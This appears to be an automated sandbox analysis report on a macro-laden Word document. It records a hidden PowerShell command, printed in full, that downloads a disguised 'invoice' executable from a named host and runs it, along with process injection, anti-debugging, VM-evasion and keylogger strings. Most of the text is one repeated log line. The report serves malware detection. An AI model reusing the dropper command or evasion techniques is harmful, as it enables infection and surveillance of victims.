Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Workbook_Open, String 4C423B4C654C4C4C5D295A444C19604C4C504C4C4C694C13754C3C4C4C4C4C4C457B4C4C7D3F664C13274C614C4C5C654C4E184C4C85894C404C577083144C4C4C4C4C4C854C285E4C8B4C756F864C4C4C544C4C4C4C4C4C4C634C4C4C644C2A6A4C4C4C4C4C4C334C4C464C4C764C2C4C4C4C4C544C4C4B4C4C8050764C724C4C184C864C4C4C4C4C4C4C4C21654C4C58464C4A4C801A47893236594C5E4C4C86696A474C
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Workbook_Open, String 4C4C464C4C4C43854C6B4C2A4C4C4F4C4C4C4B844C4C474C4C4C4C594C4C581F4C6D1B112B8A4710114C4C6B64403F33444C62733D274C4C18624C89394C714C8686654C4A4C275C487F2C104C627B4C2113414C4C81533F121F34734C4C4C724C4C4C4C324C6E384C4C4C2F4C4C144C244C3C154C121F7945864C4C5C4C2E844C4C1A284C458C4C58674C694D6B4C4C15434C1D4C4C264C4C4C85852F4C480E4C40224C4C4C4C5A5B4C1F622A4C4C204C53737B734C374C67404C4C144C4C2B4C291A564C4C2E4C4C4C730E14774C124C7255714C4C414C4C4C1C534C324C820D4C4E5A23324C4C4C354C4C4C4C5849575B504C6A4C2F7A4C4C894C4C204C4C6D4C243F4B4C13424C4C4C
Powershell connects to networkShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 78.137.164.80 80
Powershell drops PE fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\wxkh.exe

HIPS / PFW / Operating System Protection Evasion:

barindex
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: wxkh.exeBinary or memory string: <br><span style=font-size:14px;font-style:normal;text-decoration:none;text-transform:none;color:#0099cc;>[Program Manager]<span style=font-style:normal;text-decoration:none;text-transform:none;color:#000000;> (03/13/2018 22:30:42)</span></span><br><font color=#008000>{ESC}</font><font color=#008000>{ESC}</font><font color=#008000>{ESC}</font>`
Source: wxkh.exeBinary or memory string: Program Managerp
Source: wxkh.exeBinary or memory string: <br><span style=font-size:14px;font-style:normal;text-decoration:none;text-transform:none;color:#0099cc;>[Program Manager]<span style=font-style:normal;text-decoration:none;text-transform:none;color:#000000;> (03/13/2018 22:30:42)</span></span><br>
Source: wxkh.exeBinary or memory string: Program ManagerL
Source: wxkh.exeBinary or memory string: Progman
Source: wxkh.exeBinary or memory string: <br><span style=font-size:14px;font-style:normal;text-decoration:none;text-transform:none;color:#0099cc;>[Program Manager]<span style=font-style:normal;text-decoration:none;text-transform:none;color:#000000;> (03/13/2018 22:30:42)</span></span><br><font color=#008000>{ESC}</font><font color=#008000>{ESC}</font>`
Source: wxkh.exeBinary or memory string: <br><span style=font-size:14px;font-style:normal;text-decoration:none;text-transform:none;color:#0099cc;>[Program Manager]<span style=font-style:normal;text-decoration:none;text-transform:none;color:#000000;> (03/13/2018 22:30:42)</span></span><br><font color=#008000>{ESC}</font>`
Source: wxkh.exeBinary or memory string: Program Manager
Source: wxkh.exeBinary or memory string: Shell_TrayWnd
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -noprofile If (test-path $env:APPDATA + '\wxkh.exe') {Remove-Item $env:APPDATA + '\wxkh.exe'}; $OEKQD = New-Object System.Net.WebClient; $OEKQD.Headers['User-Agent'] = 'USR-KL'; $OEKQD.DownloadFile('http://peadarking.com/blackgate.ie/bless/kccInvoice.exe', $env:APPDATA + '\wxkh.exe'); (New-Object -com Shell.Application).ShellExecute($env:APPDATA + '\wxkh.exe'); Stop-Process -Id $Pid -Force
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -noprofile If (test-path $env:APPDATA + '\wxkh.exe') {Remove-Item $env:APPDATA + '\wxkh.exe'}; $OEKQD = New-Object System.Net.WebClient; $OEKQD.Headers['User-Agent'] = 'USR-KL'; $OEKQD.DownloadFile('http://peadarking.com/blackgate.ie/bless/kccInvoice.exe', $env:APPDATA + '\wxkh.exe'); (New-Object -com Shell.Application).ShellExecute($env:APPDATA + '\wxkh.exe'); Stop-Process -Id $Pid -Force
Injects a PE file into a foreign processesShow sources
Source: C:\Users\user\AppData\Roaming\wxkh.exeMemory written: C:\Users\user\AppData\Roaming\wxkh.exe base: 400000 value starts with: 4D5A
Modifies the context of a thread in another process (thread injection)Show sources
Source: C:\Users\user\AppData\Roaming\wxkh.exeThread register set: target process: 2328

Anti Debugging:

barindex
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory allocated: page read and write and page guard
Checks for debuggers (devices)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\WinSxS\FileMaps\users_sam_tarwell_appdata_roaming_0fa0aa283d546a40.cdf-ms
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSystem information queried: KernelDebuggerInformation
Enables debug privilegesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess token adjusted: Debug

Malware Analysis System Evasion:

barindex
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: wxkh.exeBinary or memory string: vmtools
Source: wxkh.exeBinary or memory string: get_Vmtools
Source: wxkh.exeBinary or memory string: get_Vboxservice
Source: wxkh.exeBinary or memory string: vboxservice
Queries a list of all running processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Contains long sleeps (>= 3 min)Show sources
Source: C:\Users\user\AppData\Roaming\wxkh.exeThread delayed: delay time: 922337203685477
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)Show sources
Source: C:\Users\user\AppData\Roaming\wxkh.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
Source: C:\Users\user\AppData\Roaming\wxkh.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess information set: NOOPENFILEERRORBOX
